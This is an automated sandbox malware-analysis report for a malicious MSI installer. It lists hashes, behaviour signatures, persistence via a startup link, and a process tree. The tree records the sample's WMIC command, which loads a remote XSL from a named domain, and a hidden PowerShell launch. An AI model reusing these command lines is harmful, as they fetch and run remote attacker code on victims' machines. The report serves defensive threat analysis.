Overview
overview
10Static
static
8test/0b627...5b.doc
windows7_x64
10test/0b627...5b.doc
windows10_x64
10test/0dded...66.doc
windows7_x64
10test/0dded...66.doc
windows10_x64
10test/91B5D...9D.msi
windows7_x64
8test/91B5D...9D.msi
windows10_x64
8test/ed01e...aa.exe
windows7_x64
10test/ed01e...aa.exe
windows10_x64
10test/fe9d7...8f.exe
windows7_x64
10test/fe9d7...8f.exe
windows10_x64
10Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
02-12-2021 10:54
Static task
static1
Behavioral task
behavioral1
Sample
test/0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
test/0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc
Resource
win10-en-20211104
Behavioral task
behavioral3
Sample
test/0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
Resource
win7-en-20211014
Behavioral task
behavioral4
Sample
test/0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
Resource
win10-en-20211104
Behavioral task
behavioral5
Sample
test/91B5DB3C0CCBD68BD04C24571E27F99D.msi
Resource
win7-en-20211014
Behavioral task
behavioral6
Sample
test/91B5DB3C0CCBD68BD04C24571E27F99D.msi
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
test/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win7-en-20211104
Behavioral task
behavioral8
Sample
test/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
test/fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe
Resource
win7-en-20211104
Behavioral task
behavioral10
Sample
test/fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe
Resource
win10-en-20211014
General
-
Target
test/91B5DB3C0CCBD68BD04C24571E27F99D.msi
-
Size
277KB
-
MD5
91b5db3c0ccbd68bd04c24571e27f99d
-
SHA1
b01cb4fe38315d41fcbe9c6278ebe4574496ab0d
-
SHA256
ec85138598c57c6a6bdb5ed470614f582d3b5a8c6b243eb2f41b9970ea13d130
-
SHA512
9f0b07f961625fcc06ee64fcfe5e35e0d40db81f75c3cbc584434c1925fac241db69cac3c1a1bf329d965a4df9bdaa53c13bb8ea3206e2c9d4facf7f74ba21b7
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 680 MsiExec.exe 7 1600 WMIC.exe 9 1872 MsiExec.exe 10 1720 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1704 lc6D53.tmp 928 nvsmartmaxapp.exe 544 gup.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvsmartmaxapp.lnk powershell.exe -
Loads dropped DLL 9 IoCs
pid Process 1872 MsiExec.exe 1872 MsiExec.exe 1872 MsiExec.exe 1872 MsiExec.exe 1872 MsiExec.exe 928 nvsmartmaxapp.exe 1632 wmplayer.exe 544 gup.exe 456 iexplore.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\Installer\f763572.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI583E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6172.tmp msiexec.exe File created C:\Windows\Installer\f763574.ipi msiexec.exe File opened for modification C:\Windows\Installer\f763574.ipi msiexec.exe File created C:\Windows\Installer\f763572.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI6A97.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI766B.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI86EF.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1720 powershell.exe 1124 msiexec.exe 1124 msiexec.exe 1720 powershell.exe 1720 powershell.exe 1720 powershell.exe 1632 wmplayer.exe 1632 wmplayer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 456 msiexec.exe Token: SeIncreaseQuotaPrivilege 456 msiexec.exe Token: SeRestorePrivilege 1124 msiexec.exe Token: SeTakeOwnershipPrivilege 1124 msiexec.exe Token: SeSecurityPrivilege 1124 msiexec.exe Token: SeCreateTokenPrivilege 456 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 456 msiexec.exe Token: SeLockMemoryPrivilege 456 msiexec.exe Token: SeIncreaseQuotaPrivilege 456 msiexec.exe Token: SeMachineAccountPrivilege 456 msiexec.exe Token: SeTcbPrivilege 456 msiexec.exe Token: SeSecurityPrivilege 456 msiexec.exe Token: SeTakeOwnershipPrivilege 456 msiexec.exe Token: SeLoadDriverPrivilege 456 msiexec.exe Token: SeSystemProfilePrivilege 456 msiexec.exe Token: SeSystemtimePrivilege 456 msiexec.exe Token: SeProfSingleProcessPrivilege 456 msiexec.exe Token: SeIncBasePriorityPrivilege 456 msiexec.exe Token: SeCreatePagefilePrivilege 456 msiexec.exe Token: SeCreatePermanentPrivilege 456 msiexec.exe Token: SeBackupPrivilege 456 msiexec.exe Token: SeRestorePrivilege 456 msiexec.exe Token: SeShutdownPrivilege 456 msiexec.exe Token: SeDebugPrivilege 456 msiexec.exe Token: SeAuditPrivilege 456 msiexec.exe Token: SeSystemEnvironmentPrivilege 456 msiexec.exe Token: SeChangeNotifyPrivilege 456 msiexec.exe Token: SeRemoteShutdownPrivilege 456 msiexec.exe Token: SeUndockPrivilege 456 msiexec.exe Token: SeSyncAgentPrivilege 456 msiexec.exe Token: SeEnableDelegationPrivilege 456 msiexec.exe Token: SeManageVolumePrivilege 456 msiexec.exe Token: SeImpersonatePrivilege 456 msiexec.exe Token: SeCreateGlobalPrivilege 456 msiexec.exe Token: SeRestorePrivilege 1124 msiexec.exe Token: SeTakeOwnershipPrivilege 1124 msiexec.exe Token: SeIncreaseQuotaPrivilege 1600 WMIC.exe Token: SeSecurityPrivilege 1600 WMIC.exe Token: SeTakeOwnershipPrivilege 1600 WMIC.exe Token: SeLoadDriverPrivilege 1600 WMIC.exe Token: SeSystemProfilePrivilege 1600 WMIC.exe Token: SeSystemtimePrivilege 1600 WMIC.exe Token: SeProfSingleProcessPrivilege 1600 WMIC.exe Token: SeIncBasePriorityPrivilege 1600 WMIC.exe Token: SeCreatePagefilePrivilege 1600 WMIC.exe Token: SeBackupPrivilege 1600 WMIC.exe Token: SeRestorePrivilege 1600 WMIC.exe Token: SeShutdownPrivilege 1600 WMIC.exe Token: SeDebugPrivilege 1600 WMIC.exe Token: SeSystemEnvironmentPrivilege 1600 WMIC.exe Token: SeRemoteShutdownPrivilege 1600 WMIC.exe Token: SeUndockPrivilege 1600 WMIC.exe Token: SeManageVolumePrivilege 1600 WMIC.exe Token: 33 1600 WMIC.exe Token: 34 1600 WMIC.exe Token: 35 1600 WMIC.exe Token: SeRestorePrivilege 1124 msiexec.exe Token: SeTakeOwnershipPrivilege 1124 msiexec.exe Token: SeIncreaseQuotaPrivilege 1600 WMIC.exe Token: SeSecurityPrivilege 1600 WMIC.exe Token: SeTakeOwnershipPrivilege 1600 WMIC.exe Token: SeLoadDriverPrivilege 1600 WMIC.exe Token: SeSystemProfilePrivilege 1600 WMIC.exe Token: SeSystemtimePrivilege 1600 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 456 msiexec.exe 456 msiexec.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 1124 wrote to memory of 680 1124 msiexec.exe 29 PID 1124 wrote to memory of 680 1124 msiexec.exe 29 PID 1124 wrote to memory of 680 1124 msiexec.exe 29 PID 1124 wrote to memory of 680 1124 msiexec.exe 29 PID 1124 wrote to memory of 680 1124 msiexec.exe 29 PID 680 wrote to memory of 1600 680 MsiExec.exe 32 PID 680 wrote to memory of 1600 680 MsiExec.exe 32 PID 680 wrote to memory of 1600 680 MsiExec.exe 32 PID 1124 wrote to memory of 1872 1124 msiexec.exe 34 PID 1124 wrote to memory of 1872 1124 msiexec.exe 34 PID 1124 wrote to memory of 1872 1124 msiexec.exe 34 PID 1124 wrote to memory of 1872 1124 msiexec.exe 34 PID 1124 wrote to memory of 1872 1124 msiexec.exe 34 PID 1124 wrote to memory of 1872 1124 msiexec.exe 34 PID 1124 wrote to memory of 1872 1124 msiexec.exe 34 PID 1600 wrote to memory of 1720 1600 WMIC.exe 35 PID 1600 wrote to memory of 1720 1600 WMIC.exe 35 PID 1600 wrote to memory of 1720 1600 WMIC.exe 35 PID 1872 wrote to memory of 1704 1872 MsiExec.exe 37 PID 1872 wrote to memory of 1704 1872 MsiExec.exe 37 PID 1872 wrote to memory of 1704 1872 MsiExec.exe 37 PID 1872 wrote to memory of 1704 1872 MsiExec.exe 37 PID 1872 wrote to memory of 1704 1872 MsiExec.exe 37 PID 1872 wrote to memory of 1704 1872 MsiExec.exe 37 PID 1872 wrote to memory of 1704 1872 MsiExec.exe 37 PID 1720 wrote to memory of 928 1720 powershell.exe 39 PID 1720 wrote to memory of 928 1720 powershell.exe 39 PID 1720 wrote to memory of 928 1720 powershell.exe 39 PID 1720 wrote to memory of 928 1720 powershell.exe 39 PID 928 wrote to memory of 1632 928 nvsmartmaxapp.exe 40 PID 928 wrote to memory of 1632 928 nvsmartmaxapp.exe 40 PID 928 wrote to memory of 1632 928 nvsmartmaxapp.exe 40 PID 928 wrote to memory of 1632 928 nvsmartmaxapp.exe 40 PID 928 wrote to memory of 1632 928 nvsmartmaxapp.exe 40 PID 1820 wrote to memory of 544 1820 taskeng.exe 42 PID 1820 wrote to memory of 544 1820 taskeng.exe 42 PID 1820 wrote to memory of 544 1820 taskeng.exe 42 PID 1820 wrote to memory of 544 1820 taskeng.exe 42 PID 544 wrote to memory of 456 544 gup.exe 43 PID 544 wrote to memory of 456 544 gup.exe 43 PID 544 wrote to memory of 456 544 gup.exe 43 PID 544 wrote to memory of 456 544 gup.exe 43 PID 544 wrote to memory of 456 544 gup.exe 43
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test\91B5DB3C0CCBD68BD04C24571E27F99D.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:456
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\MsiExec.exeC:\Windows\system32\MsiExec.exe -Embedding 71AA96348EAD1512C0DEAD1857A022DF2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden4⤵
- Blocklisted process makes network request
- Drops startup file
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Users\Admin\AppData\Roaming\onCeN\nvsmartmaxapp.exe"C:\Users\Admin\AppData\Roaming\onCeN\nvsmartmaxapp.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1632
-
-
-
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 331B5EA7F591BB202703D0E9130F74BA2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\lc6D53.tmp"C:\Users\Admin\AppData\Local\Temp\lc6D53.tmp"3⤵
- Executes dropped EXE
PID:1704
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {2FA2400B-7297-4D55-A3FE-D90141BC507C} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Users\Admin\AppData\Roaming\onCeN\gup.exeC:\Users\Admin\AppData\Roaming\onCeN\gup.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"3⤵
- Loads dropped DLL
PID:456
-
-